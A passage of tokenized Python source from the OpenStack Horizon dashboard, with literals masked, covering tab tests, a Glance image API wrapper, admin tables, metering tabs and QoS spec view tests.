get_tab ( "<STR_LIT>" ) <EOL> tab_disabled = tg . get_tab ( "<STR_LIT>" , allow_disabled = True ) <EOL> tab_disallowed = tg . get_tab ( "<STR_LIT>" ) <EOL> self . assertIsNone ( tab_disallowed ) <EOL> self . assertEqual ( "<STR_LIT>" , tab_one . get_id ( ) ) <EOL> self . assertEqual ( horizon_tabs . base . CSS_ACTIVE_TAB_CLASSES , <EOL> tab_one . get_default_classes ( ) ) <EOL> self . assertEqual ( horizon_tabs . base . CSS_DISABLED_TAB_CLASSES , <EOL> tab_disabled . get_default_classes ( ) ) <EOL> self . assertTrue ( tab_one . load ) <EOL> self . assertFalse ( tab_delayed . load ) <EOL> self . assertFalse ( tab_disabled . load ) <EOL> self . request . GET [ '<STR_LIT>' ] = tab_delayed . get_id ( ) <EOL> tg = Group ( self . request ) <EOL> tab_delayed = tg . get_tab ( "<STR_LIT>" ) <EOL> self . assertTrue ( tab_delayed . load ) <EOL> self . request . GET [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> tg = Group ( self . request ) <EOL> tab_one = tg . get_tab ( "<STR_LIT>" ) <EOL> tab_delayed = tg . get_tab ( "<STR_LIT>" ) <EOL> self . assertTrue ( tab_one . is_active ( ) ) <EOL> self . assertFalse ( tab_delayed . is_active ( ) ) <EOL> self . request . GET [ '<STR_LIT>' ] = tab_delayed . get_id ( ) <EOL> tg = Group ( self . request ) <EOL> tab_one = tg . get_tab ( "<STR_LIT>" ) <EOL> tab_delayed = tg . get_tab ( "<STR_LIT>" ) <EOL> self . assertFalse ( tab_one . is_active ( ) ) <EOL> self . assertTrue ( tab_delayed . is_active ( ) ) <EOL> def test_rendering ( self ) : <EOL> tg = Group ( self . request ) <EOL> tab_one = tg . get_tab ( "<STR_LIT>" ) <EOL> tab_delayed = tg . get_tab ( "<STR_LIT>" ) <EOL> tab_disabled = tg . get_tab ( "<STR_LIT>" , allow_disabled = True ) <EOL> output = tg . render ( ) <EOL> res = http . HttpResponse ( output . strip ( ) ) <EOL> self . assertContains ( res , "<STR_LIT>" , <NUM_LIT:3> ) <EOL> self . assertContains ( res , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> output = tab_one . render ( ) <EOL> self . assertEqual ( tab_one . name , output . 
strip ( ) ) <EOL> output = tab_disabled . render ( ) <EOL> self . assertEqual ( "<STR_LIT>" , output . strip ( ) ) <EOL> output = tab_delayed . render ( ) <EOL> self . assertEqual ( "<STR_LIT>" , output . strip ( ) ) <EOL> self . request . GET [ '<STR_LIT>' ] = tab_delayed . get_id ( ) <EOL> tg = Group ( self . request ) <EOL> tab_delayed = tg . get_tab ( "<STR_LIT>" ) <EOL> output = tab_delayed . render ( ) <EOL> self . assertEqual ( tab_delayed . name , output . strip ( ) ) <EOL> def test_table_tabs ( self ) : <EOL> tab_group = TableTabGroup ( self . request ) <EOL> tabs = tab_group . get_tabs ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( tabs ) ) <EOL> tab = tabs [ <NUM_LIT:0> ] <EOL> self . assertIsInstance ( tab , horizon_tabs . TableTab ) <EOL> self . assertFalse ( tab . _table_data_loaded ) <EOL> table = tab . _tables [ MyTable . Meta . name ] <EOL> self . assertIsInstance ( table , MyTable ) <EOL> self . assertIsNone ( table . data ) <EOL> tab . load_table_data ( ) <EOL> self . assertTrue ( tab . _table_data_loaded ) <EOL> self . assertQuerysetEqual ( table . data , [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> context = tab . get_context_data ( self . request ) <EOL> self . assertEqual ( table , context [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( table , context [ '<STR_LIT>' ] ) <EOL> def test_tabbed_table_view ( self ) : <EOL> view = TabWithTableView . as_view ( ) <EOL> req = self . factory . get ( "<STR_LIT:/>" ) <EOL> res = view ( req ) <EOL> self . assertContains ( res , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> self . assertContains ( res , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> params = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:action>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:1>" } <EOL> req = self . factory . get ( '<STR_LIT:/>' , params , <EOL> HTTP_X_REQUESTED_WITH = '<STR_LIT>' ) <EOL> res = view ( req ) <EOL> self . assertEqual ( <NUM_LIT:200> , res . status_code ) <EOL> self . 
assertContains ( res , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> self . assertContains ( res , "<STR_LIT>" , <NUM_LIT:0> ) <EOL> self . assertContains ( res , "<STR_LIT>" , <NUM_LIT:0> ) <EOL> action_string = "<STR_LIT>" <EOL> req = self . factory . post ( '<STR_LIT:/>' , { '<STR_LIT:action>' : action_string } ) <EOL> res = view ( req ) <EOL> self . assertEqual ( <NUM_LIT> , res . status_code ) <EOL> self . assertEqual ( "<STR_LIT:/>" , res [ "<STR_LIT:location>" ] ) <EOL> action_string = "<STR_LIT>" <EOL> req = self . factory . post ( '<STR_LIT:/>' , { '<STR_LIT:action>' : action_string } ) <EOL> self . assertRaises ( exceptions . Http302 , view , req ) <EOL> class TabExceptionTests ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TabExceptionTests , self ) . setUp ( ) <EOL> self . _original_tabs = copy . copy ( TabWithTableView . tab_group_class . tabs ) <EOL> TabWithTableView . tab_group_class . tabs . append ( RecoverableErrorTab ) <EOL> def tearDown ( self ) : <EOL> super ( TabExceptionTests , self ) . tearDown ( ) <EOL> TabWithTableView . tab_group_class . tabs = self . _original_tabs <EOL> def test_tab_view_exception ( self ) : <EOL> view = TabWithTableView . as_view ( ) <EOL> req = self . factory . get ( "<STR_LIT:/>" ) <EOL> res = view ( req ) <EOL> self . assertMessageCount ( res , error = <NUM_LIT:1> ) </s>
<s> from __future__ import absolute_import <EOL> import collections <EOL> import itertools <EOL> import json <EOL> import logging <EOL> from django . conf import settings <EOL> import glanceclient as glance_client <EOL> from six . moves import _thread as thread <EOL> from horizon . utils import functions as utils <EOL> from horizon . utils . memoized import memoized <EOL> from openstack_dashboard . api import base <EOL> LOG = logging . getLogger ( __name__ ) <EOL> VERSIONS = base . APIVersionManager ( "<STR_LIT:image>" , preferred_version = <NUM_LIT:2> ) <EOL> @ memoized <EOL> def glanceclient ( request , version = '<STR_LIT:1>' ) : <EOL> url = base . url_for ( request , '<STR_LIT:image>' ) <EOL> insecure = getattr ( settings , '<STR_LIT>' , False ) <EOL> cacert = getattr ( settings , '<STR_LIT>' , None ) <EOL> return glance_client . Client ( version , url , token = request . user . token . id , <EOL> insecure = insecure , cacert = cacert ) <EOL> def image_delete ( request , image_id ) : <EOL> return glanceclient ( request ) . images . delete ( image_id ) <EOL> def image_get ( request , image_id ) : <EOL> """<STR_LIT>""" <EOL> image = glanceclient ( request ) . images . get ( image_id ) <EOL> if not hasattr ( image , '<STR_LIT:name>' ) : <EOL> image . name = None <EOL> return image <EOL> def image_list_detailed ( request , marker = None , sort_dir = '<STR_LIT>' , <EOL> sort_key = '<STR_LIT>' , filters = None , paginate = False ) : <EOL> limit = getattr ( settings , '<STR_LIT>' , <NUM_LIT:1000> ) <EOL> page_size = utils . get_page_size ( request ) <EOL> if paginate : <EOL> request_size = page_size + <NUM_LIT:1> <EOL> else : <EOL> request_size = limit <EOL> kwargs = { '<STR_LIT>' : filters or { } } <EOL> if marker : <EOL> kwargs [ '<STR_LIT>' ] = marker <EOL> kwargs [ '<STR_LIT>' ] = sort_dir <EOL> kwargs [ '<STR_LIT>' ] = sort_key <EOL> images_iter = glanceclient ( request ) . images . 
list ( page_size = request_size , <EOL> limit = limit , <EOL> ** kwargs ) <EOL> has_prev_data = False <EOL> has_more_data = False <EOL> if paginate : <EOL> images = list ( itertools . islice ( images_iter , request_size ) ) <EOL> if len ( images ) > page_size : <EOL> images . pop ( - <NUM_LIT:1> ) <EOL> has_more_data = True <EOL> if marker is not None : <EOL> has_prev_data = True <EOL> elif sort_dir == '<STR_LIT>' and marker is not None : <EOL> has_more_data = True <EOL> elif marker is not None : <EOL> has_prev_data = True <EOL> else : <EOL> images = list ( images_iter ) <EOL> return ( images , has_more_data , has_prev_data ) <EOL> def image_update ( request , image_id , ** kwargs ) : <EOL> return glanceclient ( request ) . images . update ( image_id , ** kwargs ) <EOL> def image_create ( request , ** kwargs ) : <EOL> copy_from = kwargs . pop ( '<STR_LIT>' , None ) <EOL> data = kwargs . pop ( '<STR_LIT:data>' , None ) <EOL> image = glanceclient ( request ) . images . create ( ** kwargs ) <EOL> if data : <EOL> thread . start_new_thread ( image_update , <EOL> ( request , image . id ) , <EOL> { '<STR_LIT:data>' : data , <EOL> '<STR_LIT>' : False } ) <EOL> elif copy_from : <EOL> thread . start_new_thread ( image_update , <EOL> ( request , image . id ) , <EOL> { '<STR_LIT>' : copy_from , <EOL> '<STR_LIT>' : False } ) <EOL> return image <EOL> def image_update_properties ( request , image_id , remove_props = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . images . update ( image_id , <EOL> remove_props , <EOL> ** kwargs ) <EOL> def image_delete_properties ( request , image_id , keys ) : <EOL> """<STR_LIT>""" <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . images . update ( image_id , keys ) <EOL> class BaseGlanceMetadefAPIResourceWrapper ( base . APIResourceWrapper ) : <EOL> @ property <EOL> def description ( self ) : <EOL> return ( getattr ( self . 
_apiresource , '<STR_LIT:description>' , None ) or <EOL> getattr ( self . _apiresource , '<STR_LIT>' , None ) ) <EOL> def as_json ( self , indent = <NUM_LIT:4> ) : <EOL> result = collections . OrderedDict ( ) <EOL> for attr in self . _attrs : <EOL> if hasattr ( self , attr ) : <EOL> result [ attr ] = getattr ( self , attr ) <EOL> return json . dumps ( result , indent = indent ) <EOL> class Namespace ( BaseGlanceMetadefAPIResourceWrapper ) : <EOL> _attrs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:description>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> @ property <EOL> def resource_type_names ( self ) : <EOL> result = [ resource_type [ '<STR_LIT:name>' ] for resource_type in <EOL> getattr ( self . _apiresource , '<STR_LIT>' ) ] <EOL> return sorted ( result ) <EOL> @ property <EOL> def public ( self ) : <EOL> if getattr ( self . _apiresource , '<STR_LIT>' ) == '<STR_LIT>' : <EOL> return True <EOL> else : <EOL> return False <EOL> def metadefs_namespace_get ( request , namespace , resource_type = None , wrap = False ) : <EOL> namespace = glanceclient ( request , '<STR_LIT:2>' ) . metadefs_namespace . get ( namespace , resource_type = resource_type ) <EOL> if wrap : <EOL> return Namespace ( namespace ) <EOL> else : <EOL> return namespace <EOL> def metadefs_namespace_list ( request , <EOL> filters = { } , <EOL> sort_dir = '<STR_LIT>' , <EOL> sort_key = '<STR_LIT>' , <EOL> marker = None , <EOL> paginate = False ) : <EOL> """<STR_LIT>""" <EOL> limit = getattr ( settings , '<STR_LIT>' , <NUM_LIT:1000> ) <EOL> page_size = utils . get_page_size ( request ) <EOL> if paginate : <EOL> request_size = page_size + <NUM_LIT:1> <EOL> else : <EOL> request_size = limit <EOL> kwargs = { '<STR_LIT>' : filters } <EOL> if marker : <EOL> kwargs [ '<STR_LIT>' ] = marker <EOL> kwargs [ '<STR_LIT>' ] = sort_dir <EOL> kwargs [ '<STR_LIT>' ] = sort_key <EOL> namespaces_iter = glanceclient ( request , '<STR_LIT:2>' ) . 
metadefs_namespace . list ( <EOL> page_size = request_size , limit = limit , ** kwargs ) <EOL> has_prev_data = False <EOL> has_more_data = False <EOL> if paginate : <EOL> namespaces = list ( itertools . islice ( namespaces_iter , request_size ) ) <EOL> if len ( namespaces ) > page_size : <EOL> namespaces . pop ( - <NUM_LIT:1> ) <EOL> has_more_data = True <EOL> if marker is not None : <EOL> has_prev_data = True <EOL> elif sort_dir == '<STR_LIT>' and marker is not None : <EOL> has_more_data = True <EOL> elif marker is not None : <EOL> has_prev_data = True <EOL> else : <EOL> namespaces = list ( namespaces_iter ) <EOL> namespaces = [ Namespace ( namespace ) for namespace in namespaces ] <EOL> return namespaces , has_more_data , has_prev_data <EOL> def metadefs_namespace_create ( request , namespace ) : <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . metadefs_namespace . create ( ** namespace ) <EOL> def metadefs_namespace_update ( request , namespace_name , ** properties ) : <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . metadefs_namespace . update ( <EOL> namespace_name , <EOL> ** properties ) <EOL> def metadefs_namespace_delete ( request , namespace_name ) : <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . metadefs_namespace . delete ( namespace_name ) <EOL> def metadefs_resource_types_list ( request ) : <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . metadefs_resource_type . list ( ) <EOL> def metadefs_namespace_resource_types ( request , namespace_name ) : <EOL> resource_types = glanceclient ( request , '<STR_LIT:2>' ) . metadefs_resource_type . get ( <EOL> namespace_name ) <EOL> return list ( resource_types ) <EOL> def metadefs_namespace_add_resource_type ( request , <EOL> namespace_name , <EOL> resource_type ) : <EOL> return glanceclient ( request , '<STR_LIT:2>' ) . metadefs_resource_type . 
associate ( <EOL> namespace_name , ** resource_type ) <EOL> def metadefs_namespace_remove_resource_type ( request , <EOL> namespace_name , <EOL> resource_type_name ) : <EOL> glanceclient ( request , '<STR_LIT:2>' ) . metadefs_resource_type . deassociate ( <EOL> namespace_name , resource_type_name ) </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tables <EOL> class QuotaFilterAction ( tables . FilterAction ) : <EOL> def filter ( self , table , tenants , filter_string ) : <EOL> q = filter_string . lower ( ) <EOL> def comp ( tenant ) : <EOL> if q in tenant . name . lower ( ) : <EOL> return True <EOL> return False <EOL> return filter ( comp , tenants ) <EOL> class UpdateDefaultQuotas ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> url = "<STR_LIT>" <EOL> classes = ( "<STR_LIT>" , ) <EOL> icon = "<STR_LIT>" <EOL> def get_quota_name ( quota ) : <EOL> QUOTA_NAMES = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> return QUOTA_NAMES . get ( quota . name , quota . name . replace ( "<STR_LIT:_>" , "<STR_LIT:U+0020>" ) . title ( ) ) <EOL> class QuotasTable ( tables . DataTable ) : <EOL> name = tables . Column ( get_quota_name , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> limit = tables . Column ( "<STR_LIT>" , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> def get_object_id ( self , obj ) : <EOL> return obj . 
name <EOL> class Meta : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( QuotaFilterAction , UpdateDefaultQuotas ) <EOL> multi_select = False </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tables <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . dashboards . project . images . images import tables as project_tables <EOL> class AdminCreateImage ( project_tables . CreateImage ) : <EOL> url = "<STR_LIT>" <EOL> class AdminDeleteImage ( project_tables . DeleteImage ) : <EOL> def allowed ( self , request , image = None ) : <EOL> if image and image . protected : <EOL> return False <EOL> else : <EOL> return True <EOL> class AdminEditImage ( project_tables . EditImage ) : <EOL> url = "<STR_LIT>" <EOL> def allowed ( self , request , image = None ) : <EOL> return True <EOL> class UpdateMetadata ( tables . LinkAction ) : <EOL> url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , ) <EOL> icon = "<STR_LIT>" <EOL> class UpdateRow ( tables . Row ) : <EOL> ajax = True <EOL> def get_data ( self , request , image_id ) : <EOL> image = api . glance . image_get ( request , image_id ) <EOL> return image <EOL> class AdminImageFilterAction ( tables . FilterAction ) : <EOL> filter_type = "<STR_LIT>" <EOL> filter_choices = ( ( '<STR_LIT:name>' , _ ( "<STR_LIT>" ) , True ) , <EOL> ( '<STR_LIT:status>' , _ ( '<STR_LIT>' ) , True ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) , True ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) , True ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) , True ) ) <EOL> class AdminImagesTable ( project_tables . ImagesTable ) : <EOL> name = tables . Column ( "<STR_LIT:name>" , <EOL> link = "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> class Meta : <EOL> name = "<STR_LIT>" <EOL> row_class = UpdateRow <EOL> status_columns = [ "<STR_LIT:status>" ] <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( AdminCreateImage , AdminDeleteImage , <EOL> AdminImageFilterAction ) <EOL> row_actions = ( AdminEditImage , UpdateMetadata , AdminDeleteImage ) </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import messages <EOL> from horizon import tabs <EOL> from openstack_dashboard . api import ceilometer <EOL> from openstack_dashboard . dashboards . admin . metering import tables as metering_tables <EOL> from openstack_dashboard . utils import metering <EOL> class GlobalStatsTab ( tabs . TableTab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> preload = False <EOL> table_classes = ( metering_tables . UsageTable , ) <EOL> def get_context_data ( self , request ) : <EOL> meters = ceilometer . Meters ( request ) <EOL> if not meters . _ceilometer_meter_list : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> messages . warning ( request , msg ) <EOL> context = { <EOL> '<STR_LIT>' : meters . list_nova ( ) , <EOL> '<STR_LIT>' : meters . list_neutron ( ) , <EOL> '<STR_LIT>' : meters . list_glance ( ) , <EOL> '<STR_LIT>' : meters . list_cinder ( ) , <EOL> '<STR_LIT>' : meters . list_swift ( ) , <EOL> '<STR_LIT>' : meters . list_kwapi ( ) , <EOL> } <EOL> return context <EOL> class UsageReportTab ( tabs . TableTab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> table_classes = ( metering_tables . ReportTable , ) <EOL> def get_report_table_data ( self ) : <EOL> meters = ceilometer . Meters ( self . request ) <EOL> services = { <EOL> _ ( '<STR_LIT>' ) : meters . list_nova ( ) , <EOL> _ ( '<STR_LIT>' ) : meters . list_neutron ( ) , <EOL> _ ( '<STR_LIT>' ) : meters . list_glance ( ) , <EOL> _ ( '<STR_LIT>' ) : meters . list_cinder ( ) , <EOL> _ ( '<STR_LIT>' ) : meters . list_swift ( ) , <EOL> _ ( '<STR_LIT>' ) : meters . list_kwapi ( ) , <EOL> } <EOL> report_rows = [ ] <EOL> date_options = self . request . session . get ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> date_from = self . request . session . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> date_to = self . request . session . 
get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> date_from , date_to = metering . calc_date_args ( date_from , <EOL> date_to , <EOL> date_options ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , _ ( '<STR_LIT>' ) ) <EOL> try : <EOL> project_aggregates = metering . ProjectAggregatesQuery ( self . request , <EOL> date_from , <EOL> date_to , <EOL> <NUM_LIT> * <NUM_LIT> ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> for meter in meters . _cached_meters . values ( ) : <EOL> service = None <EOL> for name , m_list in services . items ( ) : <EOL> if meter in m_list : <EOL> service = name <EOL> break <EOL> res , unit = project_aggregates . query ( meter . name ) <EOL> for re in res : <EOL> values = re . get_meter ( meter . name . replace ( "<STR_LIT:.>" , "<STR_LIT:_>" ) ) <EOL> if values : <EOL> for value in values : <EOL> row = { "<STR_LIT:name>" : '<STR_LIT:none>' , <EOL> "<STR_LIT>" : re . id , <EOL> "<STR_LIT>" : meter . name , <EOL> "<STR_LIT:description>" : meter . description , <EOL> "<STR_LIT>" : service , <EOL> "<STR_LIT:time>" : value . _apiresource . period_end , <EOL> "<STR_LIT:value>" : value . _apiresource . avg } <EOL> report_rows . append ( row ) <EOL> return report_rows <EOL> class CeilometerOverviewTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( UsageReportTab , GlobalStatsTab , ) <EOL> sticky = True </s>
<s> from django . conf import settings <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> import horizon <EOL> from openstack_dashboard . dashboards . admin import dashboard <EOL> class Routers ( horizon . Panel ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = '<STR_LIT>' <EOL> permissions = ( '<STR_LIT>' , ) <EOL> network_config = getattr ( settings , '<STR_LIT>' , { } ) <EOL> if network_config . get ( '<STR_LIT>' , True ) : <EOL> dashboard . Admin . register ( Routers ) </s>
<s> from django . core . urlresolvers import reverse <EOL> from django import http <EOL> from mox import IsA <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . test import helpers as test <EOL> class QosSpecsTests ( test . BaseAdminViewTests ) : <EOL> @ test . create_stubs ( { api . cinder : ( '<STR_LIT>' , ) , } ) <EOL> def test_manage_qos_spec ( self ) : <EOL> qos_spec = self . cinder_qos_specs . first ( ) <EOL> index_url = reverse ( <EOL> '<STR_LIT>' , <EOL> args = [ qos_spec . id ] ) <EOL> api . cinder . qos_spec_get ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id ) . AndReturn ( qos_spec ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( index_url ) <EOL> self . assertTemplateUsed ( <EOL> res , '<STR_LIT>' ) <EOL> rows = res . context [ '<STR_LIT>' ] . get_rows ( ) <EOL> specs = self . cinder_qos_specs . first ( ) . specs <EOL> for row in rows : <EOL> key = row . cells [ '<STR_LIT:key>' ] . data <EOL> self . assertTrue ( key in specs ) <EOL> self . assertEqual ( row . cells [ '<STR_LIT:value>' ] . data , <EOL> specs . get ( key ) ) <EOL> @ test . create_stubs ( { api . cinder : ( '<STR_LIT>' , ) } ) <EOL> def test_create_qos_spec ( self ) : <EOL> formData = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> api . cinder . qos_spec_create ( IsA ( http . HttpRequest ) , <EOL> formData [ '<STR_LIT:name>' ] , <EOL> { '<STR_LIT>' : formData [ '<STR_LIT>' ] } ) . AndReturn ( self . cinder_qos_specs . first ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( <EOL> reverse ( '<STR_LIT>' ) , <EOL> formData ) <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , redirect ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> @ test . create_stubs ( { api . cinder : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ) } ) <EOL> def test_delete_qos_spec ( self ) : <EOL> qos_spec = self . 
cinder_qos_specs . first ( ) <EOL> formData = { '<STR_LIT:action>' : '<STR_LIT>' % qos_spec . id } <EOL> api . cinder . volume_type_list_with_qos_associations ( <EOL> IsA ( http . HttpRequest ) ) . AndReturn ( self . volume_types . list ( ) ) <EOL> api . cinder . qos_spec_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . cinder_qos_specs . list ( ) ) <EOL> api . cinder . qos_spec_delete ( IsA ( http . HttpRequest ) , <EOL> str ( qos_spec . id ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( <EOL> reverse ( '<STR_LIT>' ) , <EOL> formData ) <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , redirect ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> @ test . create_stubs ( { api . cinder : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ) , } ) <EOL> def test_spec_edit ( self ) : <EOL> qos_spec = self . cinder_qos_specs . first ( ) <EOL> key = '<STR_LIT>' <EOL> edit_url = reverse ( '<STR_LIT>' , <EOL> args = [ qos_spec . id , key ] ) <EOL> index_url = reverse ( <EOL> '<STR_LIT>' , <EOL> args = [ qos_spec . id ] ) <EOL> data = { '<STR_LIT:value>' : '<STR_LIT>' } <EOL> qos_spec . specs [ key ] = data [ '<STR_LIT:value>' ] <EOL> api . cinder . qos_spec_get ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id ) . AndReturn ( qos_spec ) <EOL> api . cinder . qos_spec_get_keys ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id , raw = True ) . AndReturn ( qos_spec ) <EOL> api . cinder . qos_spec_set_keys ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id , <EOL> qos_spec . specs ) <EOL> self . mox . ReplayAll ( ) <EOL> resp = self . client . post ( edit_url , data ) <EOL> self . assertNoFormErrors ( resp ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> self . assertRedirectsNoFollow ( resp , index_url ) <EOL> @ test . create_stubs ( { api . 
cinder : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , ) , } ) <EOL> def test_edit_consumer ( self ) : <EOL> qos_spec = self . cinder_qos_specs . first ( ) <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' } <EOL> edit_url = reverse ( <EOL> '<STR_LIT>' , <EOL> args = [ qos_spec . id ] ) <EOL> api . cinder . qos_spec_get ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id ) . AndReturn ( qos_spec ) <EOL> api . cinder . qos_spec_set_keys ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id , <EOL> { '<STR_LIT>' : formData [ '<STR_LIT>' ] } ) <EOL> self . mox . ReplayAll ( ) <EOL> resp = self . client . post ( edit_url , formData ) <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> self . assertNoFormErrors ( resp ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> self . assertRedirectsNoFollow ( resp , redirect ) <EOL> @ test . create_stubs ( { api . cinder : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ) , } ) <EOL> def test_associate_qos_spec ( self ) : <EOL> volume_type = self . volume_types . first ( ) <EOL> volume_types = self . volume_types . list ( ) <EOL> qos_spec = self . cinder_qos_specs . first ( ) <EOL> qos_specs = self . cinder_qos_specs . list ( ) <EOL> formData = { '<STR_LIT>' : qos_spec . id } <EOL> edit_url = reverse ( <EOL> '<STR_LIT>' , <EOL> args = [ volume_type . id ] ) <EOL> api . cinder . qos_spec_get ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id ) . AndReturn ( qos_spec ) <EOL> api . cinder . qos_spec_list ( IsA ( http . HttpRequest ) ) . AndReturn ( qos_specs ) <EOL> api . cinder . qos_spec_get_associations ( IsA ( http . HttpRequest ) , <EOL> qos_spec . id ) . AndReturn ( volume_types ) <EOL> api . cinder . qos_spec_get_associations ( IsA ( http . HttpRequest ) , <EOL> qos_specs [ <NUM_LIT:1> ] . id ) . AndReturn ( volume_types ) <EOL> api . cinder . volume_type_get ( IsA ( http . HttpRequest ) , <EOL> str ( volume_type . id ) ) . AndReturn ( volume_type ) <EOL> api . cinder . 
qos_spec_associate ( IsA ( http . HttpRequest ) , <EOL> qos_spec , <EOL> str ( volume_type . id ) ) <EOL> self . mox . ReplayAll ( ) <EOL> resp = self . client . post ( edit_url , formData ) <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> self . assertNoFormErrors ( resp ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> self . assertRedirectsNoFollow ( resp , redirect ) </s>
